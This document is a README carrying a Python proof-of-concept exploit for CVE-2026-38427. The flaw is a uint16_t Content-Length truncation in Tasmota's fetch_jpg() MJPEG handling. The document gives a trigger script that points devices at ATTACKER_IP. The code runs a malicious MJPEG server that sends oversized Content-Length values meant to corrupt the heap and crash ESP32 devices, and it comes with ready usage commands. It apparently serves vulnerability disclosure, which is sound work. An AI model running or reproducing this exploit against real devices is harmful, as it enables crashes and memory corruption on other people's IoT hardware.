README.md
Rendering markdown...
#!/usr/bin/env python3
"""
PoC: CVE-2026-38427
Target: Tasmota <= 15.3.0.3
File: tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino
Function: fetch_jpg() case 2
Vulnerability:
Content-Length from MJPEG frame stored in uint16_t:
char inbuff[64];
stream.readBytesUntil('\n', inbuff, sizeof(inbuff)); // "Content-Length: 70000"
char *cp = strchr(inbuff, ':');
uint16_t size = 0;
if (cp) {
size = atoi(cp + 1); // atoi("70000") = 70000 (int)
// IMPLICIT TRUNCATION: uint16_t size = 70000 → 4464 (70000 % 65536)
}
uint8_t *buff = (uint8_t *)special_malloc(size); // malloc(4464)
if (buff) {
stream.readBytes(buff, size); // reads 4464 bytes
}
// Stream still has 65536 unread bytes → heap/stream corruption
Integer Wraparound:
value → uint16_t result
65536 → 0 (if(size>0) skipped entirely)
65537 → 1 (malloc 1 byte)
70000 → 4464 (malloc 4464, but JPEG is 70000 bytes)
131072 → 0 (malloc 0 / skipped)
Impact:
- Heap corruption via stream state mismatch
- malloc(0) or malloc(1) with large data pending → crash
- On ESP32: special_malloc(0) may return non-NULL → heap corruption
Tasmota script to trigger:
>D
>B
fetchjp(ATTACKER_IP:8889/stream,0,0,1)
>1
=fetchjp(2,0,0,1) ; get next frame (triggers case 2)
Usage:
python3 CVE-2026-38427_poc.py --port 8889 --cl 65537
python3 CVE-2026-38427_poc.py --port 8889 --cl 131072
Author: Saidakbarxon Maxsudxonov
CVE: CVE-2026-38427
"""
import socket
import argparse
import time
import os
from datetime import datetime
BANNER = """
╔══════════════════════════════════════════════════════╗
║ CVE-2026-38427 PoC — Tasmota fetch_jpg() ║
║ uint16_t Integer Wraparound → Heap Overflow ║
║ Affected: Tasmota <= 15.3.0.3 (ESP32) ║
╚══════════════════════════════════════════════════════╝
"""
def log(msg, level="*"):
ts = datetime.now().strftime("%H:%M:%S")
print(f"[{ts}] [{level}] {msg}")
def uint16_wrap(value):
"""Simulate uint16_t truncation"""
return value & 0xFFFF
def make_mjpeg_frame(content_length_header, actual_data_size, fill_byte=b'\xff'):
"""
Build a single MJPEG multipart frame.
content_length_header = what we PUT in the header (malicious)
actual_data_size = how much data we actually send
"""
# Fake minimal JPEG (SOI + EOI markers)
jpeg_data = (b'\xff\xd8\xff\xe0' + # SOI + APP0 marker
b'\x00\x10JFIF\x00' + # JFIF header
b'\x01\x01\x00\x00\x01' +
b'\x00\x01\x00\x00' +
fill_byte * (actual_data_size - 20) + # padding
b'\xff\xd9') # EOI marker
jpeg_data = jpeg_data[:actual_data_size]
frame = (
f"--myboundary\r\n"
f"Content-Type: image/jpeg\r\n"
f"Content-Length: {content_length_header}\r\n"
f"\r\n"
).encode() + jpeg_data + b"\r\n"
return frame
def handle_client(conn, addr, content_length, frames):
log(f"Tasmota connected: {addr[0]}:{addr[1]}", "+")
try:
# Receive initial HTTP request
request = conn.recv(2048).decode('utf-8', errors='ignore')
log(f"Request: {request.splitlines()[0] if request else 'empty'}")
# Step 1: Send initial HTTP 200 response (fetch_jpg case 0)
actual_cl = uint16_wrap(content_length)
log(f"Content-Length in header: {content_length}")
log(f"uint16_t truncated value: {actual_cl} ({content_length} & 0xFFFF)")
log(f"Buffer allocated on ESP32: {actual_cl} bytes")
log(f"Actual data in stream: {content_length} bytes")
log(f"Unread bytes after readBytes(): {content_length - actual_cl}", "!")
# Initial response
init_response = (
"HTTP/1.1 200 OK\r\n"
"Content-Type: multipart/x-mixed-replace; boundary=myboundary\r\n"
"Connection: keep-alive\r\n"
"\r\n"
).encode()
conn.send(init_response)
log("Initial HTTP response sent (case 0 complete)")
time.sleep(0.5)
# Step 2: Send MJPEG frames with malicious Content-Length (case 2)
for i in range(frames):
log(f"Sending frame {i+1}/{frames} with Content-Length: {content_length}", "!")
# Send frame with MALICIOUS content-length header
# but actual_data = content_length bytes to fill the stream
frame = make_mjpeg_frame(
content_length_header=content_length,
actual_data_size=content_length
)
conn.send(frame)
log(f" Header says: {content_length} bytes")
log(f" ESP32 reads: {actual_cl} bytes (uint16_t wrap)")
log(f" Remaining in stream: {content_length - actual_cl} bytes (CORRUPTION!)", "!")
time.sleep(0.3)
log("All frames sent — ESP32 should crash/reboot now", "!")
time.sleep(2)
except BrokenPipeError:
log("ESP32 disconnected (likely crashed!)", "+")
except Exception as e:
log(f"Error: {e}", "-")
finally:
conn.close()
def main():
print(BANNER)
parser = argparse.ArgumentParser(description="CVE-2026-38427 PoC Server")
parser.add_argument("--ip", default="0.0.0.0")
parser.add_argument("--port", type=int, default=8889)
parser.add_argument("--cl", type=int, default=65537,
help="Malicious Content-Length (>65535)")
parser.add_argument("--frames", type=int, default=3,
help="Number of frames to send")
args = parser.parse_args()
if args.cl <= 65535:
log(f"WARNING: Content-Length {args.cl} <= 65535, no wraparound!", "-")
log("Use --cl 65537 or higher for wraparound", "-")
print(BANNER)
log("CVE-2026-38427 — uint16_t Integer Wraparound PoC", "+")
log(f"Listening: {args.ip}:{args.port}")
log(f"Content-Length: {args.cl} → wraps to {uint16_wrap(args.cl)}")
log("─" * 54)
log("Wraparound table:")
for cl in [65536, 65537, 65600, 70000, 131072, 131073]:
wrapped = uint16_wrap(cl)
log(f" {cl:>7} → {wrapped:>5} (corrupts {cl-wrapped} bytes in stream)")
log("─" * 54)
log(f"Tasmota script:")
log(f" >D")
log(f" >B")
log(f" fetchjp(YOUR_IP:{args.port}/stream,0,0,1)")
log(f" >1")
log(f" =fetchjp(2,0,0,1)")
log("─" * 54)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((args.ip, args.port))
server.listen(5)
log("Waiting for Tasmota device...", "*")
try:
while True:
conn, addr = server.accept()
handle_client(conn, addr, args.cl, args.frames)
except KeyboardInterrupt:
log("Stopped")
finally:
server.close()
if __name__ == "__main__":
main()